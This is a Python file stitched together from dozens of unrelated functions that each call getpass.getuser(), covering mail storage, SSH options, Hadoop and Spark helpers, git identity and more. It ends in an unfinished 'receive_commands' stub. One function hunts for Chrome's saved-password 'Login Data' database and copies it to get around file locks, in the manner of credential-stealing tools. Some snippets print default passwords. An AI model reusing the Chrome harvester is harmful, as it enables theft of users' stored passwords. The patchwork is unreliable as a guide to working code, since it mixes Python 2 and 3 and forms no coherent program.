import sys
from getpass import getuser

def getCloudPath():
    # original compared a bare `platform` but raised with sys.platform;
    # use sys.platform consistently
    if sys.platform == "linux2":
        return "/home/%s/Google Drive/" % getuser()
    elif sys.platform == "darwin":
        return "/Users/%s/Google Drive/" % getuser()
    else:
        raise Exception("Unsupported OS %s" % sys.platform)
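# Hedged usage sketch: getCloudPath() only knows Linux ("linux2" is the
# Python 2 value; Python 3 reports "linux") and macOS, so a caller may want
# to guard against the exception on other platforms.
try:
    cloud_root = getCloudPath()
except Exception as exc:
    cloud_root = None
    print("No Google Drive path on this platform: %s" % exc)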
def store(self, sender, receiver, message):
    if not self.owner:
        if 'filepermissions' in config and 'owner' in config['filepermissions']:
            self.owner = config['filepermissions']['owner']
        else:
            self.owner = getpass.getuser()
    if not self.group:
        if 'filepermissions' in config and 'group' in config['filepermissions']:
            self.group = config['filepermissions']['group']
        else:
            self.group = getpass.getuser()

    print('Mail will be stored as {}.{}'.format(self.owner, self.group))

    if not self.uid:
        self.uid = pwd.getpwnam(self.owner).pw_uid
    if not self.gid:
        self.gid = grp.getgrnam(self.group).gr_gid

    chown(self.path, self.uid, self.gid)
    destination = '{}/{}.mail'.format(self.path, generate_UID())
    log('Stored mail from {} to receiver {} under \'{}\''.format(sender, receiver, destination),
        product='slimSMTP', handler='storage_maildir', level=3)
    with open(destination, 'wb') as mail:
        mail.write(message)
    chown(destination, self.uid, self.gid)
    return True
def _set_data(self, data):
    """
    Portions of the job spec should be generated by the system here
    (each time new data is loaded).
    """
    now = str(datetime.datetime.now())
    self._job_data = data
    if not data.get('uuid', False):
        self._job_data['uuid'] = JobSpec.new_uuid()
    self._job_data['date'] = now
    self._job_data['version'] = rrt.get_version()
    self._job_data['user'] = getpass.getuser()
    self._job_data['logs'] = os.path.join(JOB_LOGS_UNC, getpass.getuser(),
                                          self._job_data['uuid'],
                                          self._job_data['title'] + '.*.txt')
    for k in ['renderer', 'title', 'project', 'scene', 'start', 'end', 'step', 'output']:
        if not self._job_data.get(k, False):
            raise JobSpecError("%s cannot be blank." % k)
    try:
        self._job_data['net_share'] = get_share(self._job_data['project'])
    except Exception:
        raise JobSpecError("Can't find network share for project '%s'." % self._job_data['project'])
    try:
        self._job_data['net_drive'] = os.path.splitdrive(self._job_data['project'])[0]
    except Exception:
        raise JobSpecError("Can't find drive letter in project path: '%s'" % self._job_data['project'])
def run():
    receiver = socket(AF_INET, SOCK_STREAM)
    receiver.connect((HOST, 6666))
    messages = []
    term = Terminal()
    inputs = [sys.stdin, receiver]  # renamed from `input` to avoid shadowing the builtin
    receiver.send(bytes("USERNAME " + getpass.getuser(), 'utf-8'))
    print(term.clear)
    while True:
        inputready, outputready, exceptready = select(inputs, [], [])
        quit = False
        for s in inputready:
            if s == receiver:
                data, addr = receiver.recvfrom(1024)
                messages.append(data.decode('utf-8'))
                drawBoard(term, messages)
            elif s == sys.stdin:
                msg = sys.stdin.readline()
                msg = msg.split("\n")
                if msg[0] == "!quit":
                    quit = True
                    break
                messages.append("<" + getpass.getuser() + "> " + msg[0])
                receiver.send(bytes(msg[0], 'utf-8'))
                drawBoard(term, messages)
        if quit:
            break
    receiver.close()
    print(term.clear)
def parse_options():
    global g_verbose

    parser = OptionParser(usage='usage: %prog [options] <ssh-server>[:<server-port>]',
                          version='%prog 1.0', description=HELP)
    parser.add_option('-q', '--quiet', action='store_false', dest='verbose', default=True,
                      help='squelch all informational output')
    parser.add_option('-p', '--remote-port', action='store', type='int', dest='port',
                      default=DEFAULT_PORT,
                      help='port on server to forward (default: %d)' % DEFAULT_PORT)
    parser.add_option('-u', '--user', action='store', type='string', dest='user',
                      default=getpass.getuser(),
                      help='username for SSH authentication (default: %s)' % getpass.getuser())
    parser.add_option('-K', '--key', action='store', type='string', dest='keyfile',
                      default=None,
                      help='private key file to use for SSH authentication')
    parser.add_option('', '--no-key', action='store_false', dest='look_for_keys', default=True,
                      help='don\'t look for or use a private key file')
    parser.add_option('-P', '--password', action='store_true', dest='readpass', default=False,
                      help='read password (for key or password auth) from stdin')
    parser.add_option('-r', '--remote', action='store', type='string', dest='remote',
                      default=None, metavar='host:port',
                      help='remote host and port to forward to')
    options, args = parser.parse_args()

    if len(args) != 1:
        parser.error('Incorrect number of arguments.')
    if options.remote is None:
        parser.error('Remote address required (-r).')

    g_verbose = options.verbose
    server_host, server_port = get_host_port(args[0], SSH_PORT)
    remote_host, remote_port = get_host_port(options.remote, SSH_PORT)
    return options, (server_host, server_port), (remote_host, remote_port)
def _teardown(self, config, temp):
    # Picard creates a folder named after the user in the temp-root
    try_rmtree(os.path.join(temp, getpass.getuser()))
    # Some JREs may create a folder for temporary performance counters
    try_rmtree(os.path.join(temp, "hsperfdata_" + getpass.getuser()))
    CommandNode._teardown(self, config, temp)
def fix_missing_spark_user(cl, prog, params):
    """Adjust /etc/passwd and GATK parameters if current username missing.

    Set Spark user to avoid lookup errors on environments like Docker
    where we run as a user id that is not present in /etc/passwd

    https://stackoverflow.com/questions/45198252/apache-spark-standalone-for-anonymous-uid-without-user-name/45361221#45361221
    https://github.com/jaceklaskowski/mastering-apache-spark-book/blob/master/spark-sparkcontext-creating-instance-internals.adoc#-utilsgetcurrentusername
    https://blog.openshift.com/jupyter-on-openshift-part-6-running-as-an-assigned-user-id/
    """
    if prog.find("Spark") >= 0 or "--spark-master" in params:
        user = None
        try:
            user = getpass.getuser()
        except KeyError:
            if os.access("/etc/passwd", os.W_OK):
                with open("/etc/passwd", "a") as out_handle:
                    out_handle.write("sparkanon:x:{uid}:{uid}:sparkanon:/nonexistent:/usr/sbin/nologin\n"
                                     .format(uid=os.getuid()))
                try:
                    user = getpass.getuser()
                except KeyError:
                    pass
        if user:
            cl = "export SPARK_USER=%s && " % (user) + cl
    return cl
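# Hedged usage sketch (the GATK command line and params below are made up):
# the helper only rewrites the command when it looks Spark-related and a
# username can be resolved.
cl = "gatk MarkDuplicatesSpark -I in.bam -O out.bam"
cl = fix_missing_spark_user(cl, "MarkDuplicatesSpark", ["--spark-master", "local[4]"])
print(cl)  # "export SPARK_USER=<user> && gatk ..." when getpass.getuser() succeeds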
def __get_file_paths():
    # note: the original listed the "My Music" path twice; the duplicate is dropped
    return [
        r'C:\Documents and Settings\{!s}\My Documents\My Music\iTunes\\'.format(
            getpass.getuser()
        ),
        r'C:\Users\{!s}\Music\iTunes\\'.format(
            getpass.getuser()
        ),
        r'C:\Users\{!s}\My Music\iTunes\\'.format(
            getpass.getuser()
        ),
    ]
def compile_macro(config, macro):
    """
    Creates the library from a macro using CINT, compiling it in scratch
    to avoid problems with the linking in the working nodes.
    Args:
        config: configuration file where the macro path is specified
        macro: macro name to be compiled
    Returns:
        nothing
    """
    submitDir = os.getcwd()
    _macro = macro + '.h'
    library = config.get(macro, 'library')
    libDir = os.path.dirname(library)
    os.chdir(libDir)
    if not os.path.exists(library):
        print '@INFO: Compiling ' + _macro
        scratchDir = '/scratch/%s/' % (getpass.getuser())
        # shutil.copyfile(libDir+'/'+_macro,'/scratch/%s/%s'%(getpass.getuser(),_macro))
        # copy the whole directory: the macro includes other files and
        # otherwise will not compile
        os.system("cp " + libDir + '/* /scratch/%s/' % (getpass.getuser()))
        os.chdir(scratchDir)
        ROOT.gROOT.ProcessLine('.L %s+' % (scratchDir + _macro))
        # ROOT.gSystem.CompileMacro('%s'%(scratchDir+_macro))  # crashes while compiling the second one
        # print("gcc -shared -o "+library+" `root-config --glibs --libs --cflags` -fPIC "+scratchDir+_macro)
        # os.system("gcc -shared -o "+library+" `root-config --glibs --libs --cflags` -fPIC "+scratchDir+_macro)
        shutil.copyfile('/scratch/%s/%s' % (getpass.getuser(), os.path.basename(library)), library)
    os.chdir(submitDir)
def SaveAs(p, savePath, saveName, saveFormats, verbose=True):
    ''' '''
    Verbose("Saving plots in %s format(s)" % (len(saveFormats)), True)
    if verbose:
        Print("Saving plots in %s format(s)" % (len(saveFormats)), True)

    # For-loop: All formats to save file
    for ext in saveFormats:
        sName = saveName + ext

        # Change print name if saved under html
        if "html" in sName:
            user = getpass.getuser()
            initial = getpass.getuser()[0]
            sName = sName.replace("/afs/cern.ch/user/%s/" % (initial), "http://cmsdoc.cern.ch/~")
            sName = sName.replace("%s/public/html/" % (user), "%s/" % (user))

        # Print save name
        print "\t", sName

    # Check if dir exists
    if not os.path.exists(savePath):
        os.mkdir(savePath)

    # Save the plots
    p.saveAs(saveName, saveFormats)
    return
def run(self, software_name=None):
    database_path = ''
    homedrive = ''
    homepath = ''
    if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ:
        homedrive = os.environ.get('HOMEDRIVE')
        homepath = os.environ.get('HOMEPATH')

    # All possible paths
    pathTab = [
        homedrive + homepath + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data',
        homedrive + homepath + '\AppData\Local\Google\Chrome\User Data\Default\Login Data',
        homedrive + '\Users\\' + getpass.getuser() + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data',
        homedrive + '\Users\\' + getpass.getuser() + '\AppData\Local\Google\Chrome\User Data\Default\Login Data',
        'C:\Users\\' + getpass.getuser() + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data',
        'C:\Users\\' + getpass.getuser() + '\AppData\Local\Google\Chrome\User Data\Default\Login Data'
    ]

    database_path = [p for p in pathTab if os.path.exists(p)]
    if not database_path:
        print_debug('INFO', 'Google Chrome not installed.')
        return

    # if several paths are valid, keep the first one (the original only
    # unwrapped the list when len != 1, leaving a list for exactly one match)
    database_path = database_path[0]

    # Copy the database before querying it (bypass lock errors)
    try:
        shutil.copy(database_path, os.getcwd() + os.sep + 'tmp_db')
        database_path = os.getcwd() + os.sep + 'tmp_db'
    except Exception, e:
        print_debug('DEBUG', '{0}'.format(e))
        print_debug('ERROR', 'An error occurred copying the database file')
def test_expand_path(self):
    """
    Exercises the expand_path() method with actual runtime data.
    """
    # Some of the following tests get confused when ran as root. For instance,
    # in my case...
    #
    # >>> os.path.expanduser("~")
    # '/home/atagar'
    #
    # >>> os.path.expanduser("~root")
    # '/root'
    if getpass.getuser() == 'root':
        test.runner.skip(self, "(running as root)")
        return

    self.assertEquals(os.getcwd(), stem.util.system.expand_path("."))
    self.assertEquals(os.getcwd(), stem.util.system.expand_path("./"))
    self.assertEquals(os.path.join(os.getcwd(), "foo"), stem.util.system.expand_path("./foo"))

    home_dir, username = os.path.expanduser("~"), getpass.getuser()
    self.assertEquals(home_dir, stem.util.system.expand_path("~"))
    self.assertEquals(home_dir, stem.util.system.expand_path("~/"))
    self.assertEquals(home_dir, stem.util.system.expand_path("~%s" % username))
    self.assertEquals(os.path.join(home_dir, "foo"), stem.util.system.expand_path("~%s/foo" % username))
def defaults(environ=os.environ):
    """
    Produce the defaults based on the existing configuration.
    """
    user = getuser() or 'postgres'
    userdir = os.path.expanduser('~' + user) or '/dev/null'
    pgdata = os.path.join(userdir, pg_home_directory)
    yield ('user',), getuser()
    yield ('host',), default_host
    yield ('port',), default_port

    # If appdata is available, override the pgdata and pgpassfile
    # configuration settings.
    if sys.platform == 'win32':
        appdata = environ.get('APPDATA')
        if appdata:
            pgdata = os.path.join(appdata, pg_appdata_directory)
            pgpassfile = os.path.join(pgdata, pg_appdata_passfile)
    else:
        pgpassfile = os.path.join(userdir, pg_home_passfile)

    for k, v in (
        ('sslcrtfile', os.path.join(pgdata, 'postgresql.crt')),
        ('sslkeyfile', os.path.join(pgdata, 'postgresql.key')),
        ('sslrootcrtfile', os.path.join(pgdata, 'root.crt')),
        ('sslrootcrlfile', os.path.join(pgdata, 'root.crl')),
        ('pgpassfile', pgpassfile),
    ):
        if os.path.exists(v):
            yield (k,), v
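# Hedged usage sketch: defaults() yields ((key,), value) pairs, so a caller
# can flatten them into a plain settings dict before opening a connection.
settings = {k[0]: v for k, v in defaults()}
# e.g. settings.get('pgpassfile') is only present when the file exists on disk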
def readSettingsOnStart(self):
    settings = self.settings
    settings.setValue('lastSession/exitStatus', settings.value('currentSession/exitStatus', u'ok'))
    settings.setValue('lastSession/fileName', settings.value('currentSession/fileName', None))
    settings.setValue('lastSession/bakFileName', settings.value('currentSession/bakFileName', None))
    settings.setValue('lastSession/user', settings.value('currentSession/user', getpass.getuser()))
    settings.setValue('currentSession/exitStatus', u'crash')
    settings.setValue('currentSession/fileName', None)
    settings.setValue('currentSession/bakFileName', None)
    settings.setValue('currentSession/changesUnsaved', False)
    settings.setValue('currentSession/user', getpass.getuser())

    # restore GUI settings only if the config file was previously generated
    # by the same user
    if settings.value('currentSession/user') != settings.value('lastSession/user') \
            and settings.value('lastSession/user') is not None:
        return

    self.win.resize(settings.value('mainwindow/size', QtCore.QSize(800, 800)))
    self.win.move(settings.value('mainwindow/pos', QtCore.QPoint(400, 400)))
    self.win.splitter.setSizes(settings.value('mainwindow/splitter_sizes', [150, 500]))
    if settings.value('mainwindow/state') is not None:
        self.win.restoreState(settings.value('mainwindow/state'))
    #if settings.value('mainwindow/geometry_nodelibrary_dockwidget') is not None:
    #    self.win.dockWidget.setGeometry(settings.value('mainwindow/geometry_nodelibrary_dockwidget'))
    #if settings.value('mainwindow/geometry_nodecontrol_dockwidget') is not None:
    #    self.win.dockWidget_2.setGeometry(settings.value('mainwindow/geometry_nodecontrol_dockwidget'))
    if settings.value('mainwindow/fullScreen', False) is True:
        self.win.showFullScreen()
    #self.updateRecentFileActions()  #>>> is moved to INIT of MainWindow since actions are not inited yet
    logger.info('Settings file loaded [{0}]'.format(settings.fileName()))
def __init__(self):
    # building path
    config.appliance_url = "https://conjur-dev-master.d1.opendns.com/api"
    config.account = "dev"
    config.cert_file = "/Users/" + getpass.getuser() + "/.conjur/conjur-dev.pem"
    self.conjurapi = conjur.new_from_netrc("/Users/" + getpass.getuser() + "/.netrc", config=config)
    print getpass.getuser()
def dispatch(self, event):
    mh = getToolByName(self, 'MailHost')
    portal = getToolByName(self, 'portal_url').getPortalObject()
    host = getattr(self, 'REQUEST', {}).get('HTTP_HOST', socket.getfqdn())
    data = {'host': host}
    data.update(event.data)
    data.update({'subject': event.subject,
                 'level': event.level,
                 'message': event.message,
                 'data': event.data})
    subject = (self.subject_format or self.default_subject_format) % data
    message = (self.message_format or self.default_message_format) % data
    failover_mail_host = data['host'].split(':', 1)[0]
    mail_to = self.mail_to or \
        portal.getProperty('email_from_address') or \
        '%s@%s' % (getpass.getuser(), failover_mail_host)
    mail_from = self.mail_from or \
        portal.getProperty('email_from_address') or \
        '%s@%s' % (getpass.getuser(), failover_mail_host)
    try:
        mh.send(message, mail_to, mail_from, subject, immediate=True)
    except:  # TODO
        pass
def generate_log(log, what2log):
    # append if the log already exists, otherwise create it; both branches
    # of the original wrote the same record
    mode = "ab" if os.path.isfile(log) else "wb"
    with open(log, mode) as fo:
        fo.write(time.strftime("%Y-%m-%dT%H:%M:%S ") + getpass.getuser() + ' ' + what2log + ' \n')
def setUp(self):
    self.__hadoopConfig = hadoopConfig()
    self.rootDir = '/tmp/hod-%s' % getpass.getuser()
    if not os.path.exists(self.rootDir):
        os.mkdir(self.rootDir)
    self.testingDir = tempfile.mkdtemp(dir=self.rootDir,
                                       prefix='HadoopTestSuite.test_hadoopConfig')
    self.confDir = tempfile.mkdtemp(dir=self.rootDir,
                                    prefix='HadoopTestSuite.test_hadoopConfig')
    self.tempDir = '/tmp/hod-%s/something' % getpass.getuser()
    self.hadoopSite = os.path.join(self.confDir, 'hadoop-site.xml')
    self.numNodes = 4
    self.hdfsAddr = 'nosuchhost1.apache.org:50505'
    self.mapredAddr = 'nosuchhost2.apache.org:50506'
    self.finalServerParams = {
        'mapred.child.java.opts': '-Xmx1024m',
        'mapred.compress.map.output': 'false',
    }
    self.serverParams = {
        'mapred.userlog.limit': '200',
        'mapred.userlog.retain.hours': '10',
        'mapred.reduce.parallel.copies': '20',
    }
    self.clientParams = {
        'mapred.tasktracker.tasks.maximum': '2',
        'io.sort.factor': '100',
        'io.sort.mb': '200',
        'mapred.userlog.limit.kb': '1024',
        'io.file.buffer.size': '262144',
    }
    self.clusterFactor = 1.9
    self.mySysDir = '/user/' + getpass.getuser() + '/mapredsystem'
def downloadYouTube(self, path, url):
    username = getpass.getuser()
    try:
        os.mkdir("/home/" + username + "/temp")
    except OSError:
        pass  # temp dir already exists
    os.chdir("/home/" + getpass.getuser() + "/temp")
    dirname = str(random.getrandbits(128))
    try:
        os.mkdir(dirname)
    except OSError:
        pass
    os.chdir(dirname)
    with youtube_dl.YoutubeDL(self.ydl_opts) as ydl:
        ydl.download([url])
    for fil in os.listdir():
        shutil.move(fil, path + "/" + fil)
    os.chdir("/home/" + username + "/temp")
    shutil.rmtree(dirname)
def test_run_daemon(self):
    sample_conf = "[my-daemon]\nuser = %s\n" % getuser()
    with tmpfile(sample_conf) as conf_file:
        with mock.patch.dict('os.environ', {'TZ': ''}):
            with mock.patch('time.tzset') as mock_tzset:
                daemon.run_daemon(MyDaemon, conf_file)
                self.assertTrue(MyDaemon.forever_called)
                self.assertEqual(os.environ['TZ'], 'UTC+0')
                self.assertEqual(mock_tzset.mock_calls, [mock.call()])
        daemon.run_daemon(MyDaemon, conf_file, once=True)
        self.assertEqual(MyDaemon.once_called, True)

        # test raise in daemon code
        with mock.patch.object(MyDaemon, 'run_once', MyDaemon.run_raise):
            self.assertRaises(OSError, daemon.run_daemon, MyDaemon,
                              conf_file, once=True)

        # test user quit
        sio = StringIO()
        logger = logging.getLogger('server')
        logger.addHandler(logging.StreamHandler(sio))
        logger = utils.get_logger(None, 'server', log_route='server')
        with mock.patch.object(MyDaemon, 'run_forever', MyDaemon.run_quit):
            daemon.run_daemon(MyDaemon, conf_file, logger=logger)
        self.assertTrue('user quit' in sio.getvalue().lower())

    # test missing section
    sample_conf = "[default]\nuser = %s\n" % getuser()
    with tmpfile(sample_conf) as conf_file:
        self.assertRaisesRegexp(SystemExit,
                                'Unable to find my-daemon config section in.*',
                                daemon.run_daemon, MyDaemon, conf_file,
                                once=True)
def __init__(self, cloud_num, nodes_per_cloud, node_num, cloud_name,
             h2o_jar, ip, base_port, xmx, output_dir, isEC2):
    """
    Create a node in a cloud.

    @param cloud_num: Dense 0-based cloud index number.
    @param nodes_per_cloud: How many H2O java instances are in a cloud. Clouds are symmetric.
    @param node_num: This node's dense 0-based node index number.
    @param cloud_name: The H2O -name command-line argument.
    @param h2o_jar: Path to H2O jar file.
    @param base_port: The starting port number we are trying to get our nodes to listen on.
    @param xmx: Java memory parameter.
    @param output_dir: The directory where we can create an output file for this process.
    @param isEC2: Whether or not this node is an EC2 node.
    @return: The node object.
    """
    self.cloud_num = cloud_num
    self.nodes_per_cloud = nodes_per_cloud
    self.node_num = node_num
    self.cloud_name = cloud_name
    self.h2o_jar = h2o_jar
    self.ip = ip
    self.base_port = base_port
    self.xmx = xmx
    self.output_dir = output_dir
    self.isEC2 = isEC2

    self.addr = self.ip
    self.http_addr = self.ip
    self.username = getpass.getuser()
    self.password = getpass.getuser()
    if self.isEC2:
        self.username = '******'
        self.password = None

    self.ssh = paramiko.SSHClient()
    policy = paramiko.AutoAddPolicy()
    self.ssh.set_missing_host_key_policy(policy)
    self.ssh.load_system_host_keys()
    if self.password is None:
        self.ssh.connect(self.addr, username=self.username)
    else:
        self.ssh.connect(self.addr, username=self.username, password=self.password)

    # keep connection alive - send a keepalive packet every 5 minutes
    self.ssh.get_transport().set_keepalive(300)

    self.uploaded = {}
    self.port = -1
    self.output_file_name = ""
    self.error_file_name = ""
    self.terminated = False

    # Choose my base port number here. All math is done here. Every node has the same
    # base_port and calculates its own my_base_port.
    ports_per_node = 2
    self.my_base_port = \
        int(self.base_port) + \
        int(self.cloud_num * self.nodes_per_cloud * ports_per_node) + \
        int(self.node_num * ports_per_node)
def _get_user_identity(self):
    """Determine the identity to use for new commits.
    """
    user = os.environ.get("GIT_COMMITTER_NAME")
    email = os.environ.get("GIT_COMMITTER_EMAIL")
    config = self.get_config_stack()
    if user is None:
        try:
            user = config.get(("user", ), "name")
        except KeyError:
            user = None
    if email is None:
        try:
            email = config.get(("user", ), "email")
        except KeyError:
            email = None
    if user is None:
        import getpass
        user = getpass.getuser().encode(sys.getdefaultencoding())
    if email is None:
        import getpass
        import socket
        email = ("{}@{}".format(getpass.getuser(), socket.gethostname())
                 .encode(sys.getdefaultencoding()))
    return (user + b" <" + email + b">")
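# Hedged usage sketch: the identity comes back as bytes in git's
# "Name <email>" commit format; with no GIT_COMMITTER_* variables and no
# user.name/user.email config it falls back to getpass plus the hostname.
# Assumes a git repository in the current directory.
from dulwich.repo import Repo

repo = Repo('.')
print(repo._get_user_identity())  # e.g. b'alice <alice@workstation>' (hypothetical)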
def get_info():
    # accumulo
    print hilite(" ~==:..=======:,, ", False, True)
    print hilite(" ========...====.==:::==~======.... ", False, True)
    print hilite(" ===..==.....==..:=.........===========. ", False, True)
    print hilite(" ===...=......==.............==,==.....==. ", False, True)
    print hilite(" ====,...:......==..............==.=......==.. ", False, True)
    print hilite(" ,===============.=,...........=................=..~..===.=.... ", False, True)
    print hilite(" =...........,==...............,,.................=....,=.:.=..======~~. ", False, True)
    print hilite(" :............==.................=........................==,..==........=== ", False, True)
    print hilite("............=,.............................................=....==........=.= ", False, True)
    print hilite("..................................................................=,.........=. ", False, True)
    print hilite("Docker-Geomesa successfully deployed. Instance information is as follows... ", False, True)
    ireport = dc.inspect_container("tests-accumulo")
    host_port = ireport['NetworkSettings']['Ports']
    print 'Namenode: http://' + remote_docker_daemon_host + ":" + host_port['50070/tcp'][0]['HostPort']
    print 'Accumulo Monitor: http://' + remote_docker_daemon_host + ":" + host_port['50095/tcp'][0]['HostPort']
    print 'Zookeeper: ' + remote_docker_daemon_host + ":" + host_port['2181/tcp'][0]['HostPort']
    print 'Username: root\nPassword: toor'
    print 'Instance Name: docker_instance'
    print 'Data Volume: /home/' + getpass.getuser() + '/geomesa-docker-volumes/accumulo-data -> accumulo:/data-dir'
    print 'Dependency Volume: /home/' + getpass.getuser() + '/geomesa-docker-volumes/accumulo-libs -> accumulo:' \
          '/opt/accumulo/accumulo-1.5.2/lib/ext/'

    # yarn
    ireport = dc.inspect_container("tests-yarn")
    host_port = ireport['NetworkSettings']['Ports']
    print '\nYarn Resource Manager: http://' + remote_docker_daemon_host + ":" + host_port['8088/tcp'][0]['HostPort']
    print 'Yarn Node Manager: http://' + remote_docker_daemon_host + ":" + host_port['8042/tcp'][0]['HostPort']

    # geoserver
    ireport = dc.inspect_container("tests-geoserver")
    host_port = ireport['NetworkSettings']['Ports']
    status = '\nGeoServer Web Admin: http://' + remote_docker_daemon_host + ':' + host_port['8080/tcp'][0]['HostPort'] \
             + '/geoserver/index.html' + '\nUsername: admin\nPassword: geoserver'
    print status
def __init__(self, access_key, secret_access_key, queue_name, revision=0, connection_kwargs={}):
    """:param connection_kwargs: arguments to be used when creating the
    underlying boto connection to aws"""
    logging.Handler.__init__(self)
    self._access_key = access_key
    self._secret_access_key = secret_access_key
    self._connection_kwargs = connection_kwargs
    self._queue_name = queue_name
    self._records_to_emit = []
    self._queue = None
    self._connected = True
    self._threaded_timer = ThreadedTimer(1000, self)
    self._threaded_timer.start()
    try:
        if sys.platform.startswith('win'):
            # on windows getuser() uses the USERNAME env var
            # from sys.getfilesystemencoding documentation:
            # On Windows NT+, file names are Unicode natively, so no conversion is performed.
            # getfilesystemencoding() still returns 'mbcs', as this is the encoding that applications
            # should use when they explicitly want to convert Unicode strings
            # to byte strings that are equivalent when used as file names.
            self._user = getpass.getuser().decode('mbcs')
        else:
            self._user = getpass.getuser()
    except Exception:
        self._user = getpass.getuser().encode('ascii', 'ignore')
    self._revision = revision
def setUp(self):
    self.CUSTOM_BASE_DIR = '/tmp/new-cloudify-ctx'
    user = getpass.getuser()
    if user not in ['ubuntu', 'travis']:
        raise unittest.SkipTest()
    super(FabricPluginRealSSHTests, self).setUp()
    user = getpass.getuser()
    if user == 'travis':
        self.default_fabric_env = {
            'host_string': 'localhost',
            'user': '******',
            'password': '******'
        }
    if user == 'ubuntu':
        self.default_fabric_env = {
            'host_string': 'localhost',
            'user': '******',
            'key_filename': '/home/ubuntu/.ssh/build_key.rsa'
        }
    tasks.fabric_api = self.original_fabric_api
    with context_managers.settings(**self.default_fabric_env):
        if files.exists(tasks.DEFAULT_BASE_DIR):
            api.run('rm -rf {0}'.format(tasks.DEFAULT_BASE_DIR))
        if files.exists(self.CUSTOM_BASE_DIR):
            api.run('rm -rf {0}'.format(self.CUSTOM_BASE_DIR))
def GetSavePath(**kwargs):
    ''' '''
    HasKeys(["savePath", "analysis", "verbose"], **kwargs)
    savePath = kwargs.get("savePath")
    analysis = kwargs.get("analysis")
    verbose = kwargs.get("verbose")
    if verbose:
        print "\t--- Constructing path where plots will be saved"
    if savePath != None:
        return savePath

    # Get username and the initial of the username
    user = getpass.getuser()
    initial = getpass.getuser()[0]

    # Set the save path depending on the host (elif keeps the lxplus result
    # from being overwritten by the default branch, as the original's
    # second `if`/`else` did)
    if "lxplus" in socket.gethostname():
        savePath = "/afs/cern.ch/user/%s/%s/public/html/%s/" % (initial, user, analysis)
    elif "lpc" in socket.gethostname():
        savePath = "/publicweb/%s/%s/%s/" % (initial, user, analysis)
    else:
        savePath = "/Users/%s/Desktop/Plots/" % (user)
    return savePath
def compareByKey(rdd_1, rdd_2):
    in_a_not_in_b = rdd_1.subtractByKey(rdd_2)
    in_b_not_in_a = rdd_2.subtractByKey(rdd_1)
    in_a_and_b = rdd_1.join(rdd_2)
    equal_seqs = in_a_and_b.filter(lambda x: x[1][0] == x[1][1])
    diff_seqs = in_a_and_b.subtractByKey(equal_seqs)

    a = in_a_not_in_b.count()
    b = in_b_not_in_a.count()
    c = in_a_and_b.count()
    d = equal_seqs.count()
    e = diff_seqs.count()

    path_in_a_not_in_b = "/user/" + getpass.getuser() + "/output/" + "in_a_not_in_b"
    path_in_b_not_in_a = "/user/" + getpass.getuser() + "/output/" + "in_b_not_in_a"
    path_equal_seqs = "/user/" + getpass.getuser() + "/output/" + "equal_seqs"
    path_diff_seqs = "/user/" + getpass.getuser() + "/output/" + "diff_seqs"

    os.system("hadoop fs -rm -r output")
    os.system("hadoop fs -ls")
    os.system("hadoop fs -mkdir output")

    in_a_not_in_b.saveAsTextFile(path_in_a_not_in_b)
    in_b_not_in_a.saveAsTextFile(path_in_b_not_in_a)
    equal_seqs.saveAsTextFile(path_equal_seqs)
    diff_seqs.saveAsTextFile(path_diff_seqs)

    print("\nComparison output saved in: " + "/user/" + getpass.getuser() + "/output/")
    print("\nids in A not in B = %d \nids in B not in A = %d \nids in A and in B = %d "
          "\nidentical id and sequence = %d \nidentical id but different sequence = %d" % (a, b, c, d, e))
    return [a, b, c, d, e]
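# Hedged usage sketch (assumes an active SparkContext `sc` and HDFS access;
# the sample data is made up): the RDDs are (id, sequence) pairs.
rdd_a = sc.parallelize([("id1", "ACGT"), ("id2", "GGCC")])
rdd_b = sc.parallelize([("id1", "ACGT"), ("id3", "TTAA")])
counts = compareByKey(rdd_a, rdd_b)  # -> [a, b, c, d, e] summary counts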
def add_arguments(cls, parser, defaults=None):
    """
    Adds the arguments to an :class:`argparse.ArgumentParser` in order to
    create a database connection.
    """
    defaults = defaults if defaults is not None else {}
    default_host = defaults.get('host', "localhost")
    parser.add_argument(
        '--host', '-h',
        help="MySQL database host to connect to (defaults to {0})".format(default_host),
        default=default_host
    )
    default_database = defaults.get('database', getpass.getuser())
    parser.add_argument(
        '--database', '-d',
        help="MySQL database name to connect to (defaults to {0})".format(default_database),
        default=default_database
    )
    default_defaults_file = defaults.get('defaults-file', os.path.expanduser("~/.my.cnf"))
    parser.add_argument(
        '--defaults-file',
        help="MySQL defaults file (defaults to {0})".format(default_defaults_file),
        default=default_defaults_file
    )
    default_user = defaults.get('user', getpass.getuser())
    parser.add_argument(
        '--user', '-u',
        help="MySQL user (defaults to {0})".format(default_user),
        default=default_user
    )
    return parser
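# Hedged usage sketch (the owning class name is hypothetical): add_arguments()
# grafts the MySQL options onto a caller's parser. add_help=False matters,
# because '--host' claims the '-h' short flag that argparse's built-in help
# would otherwise own.
import argparse

parser = argparse.ArgumentParser(description="Connect to MySQL", add_help=False)
SomeDatabaseClass.add_arguments(parser, defaults={'host': 'db.example.org'})
args = parser.parse_args(['-u', 'reporter', '-d', 'enwiki'])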
def serve_forever():
    username = None
    password = None

    # Read the username and password from a config file.
    # If not present, prompt the user for their credentials.
    parser = ConfigParser.SafeConfigParser()
    path = os.path.expanduser('~/.beerbug/beerbug.ini')
    parser.read(path)
    if parser is not None:
        try:
            try:
                username = parser.get('google', 'username')
            except ConfigParser.NoOptionError:
                pass
            try:
                password = parser.get('google', 'password')
            except ConfigParser.NoOptionError:
                pass
        except ConfigParser.NoSectionError:
            pass

    if username is None:
        username = raw_input('Enter Google Docs username [' + getpass.getuser() + ']: ')
        if username.strip() == '':
            username = getpass.getuser()
    if password is None:
        password = getpass.getpass('Enter Google Docs password: ')

    serve(username, password)
def run(self):
    while True:
        username = raw_input('username(%s): ' % getpass.getuser())
        if username == '':
            username = getpass.getuser()
        if not re.match(r'[A-Za-z\.0-9]+', username):
            print 'Invalid Username'
        else:
            break
    while True:
        email = raw_input('email: ')
        if not re.match(r'[A-Za-z\.0-9\+]+@\w+(\.\w+)*', email):
            print 'Invalid email'
        else:
            break
    while True:
        # the password prompts were redacted in the source; reconstructed
        # from the rpasswd comparison below
        passwd = getpass.getpass('password: ')
        rpasswd = getpass.getpass('repeat: ')
        if passwd != rpasswd:
            print 'Password not matching!'
        else:
            break

    from vilya.models.user import User
    user = User()
    user.username = username
    user.email = email
    user.admin = True
    user.active = True
    user.set_password(passwd)
    user.save()
    print 'Super user created!'
def receive_commands(self):
    """ Receives Commands from Server """
    while True:
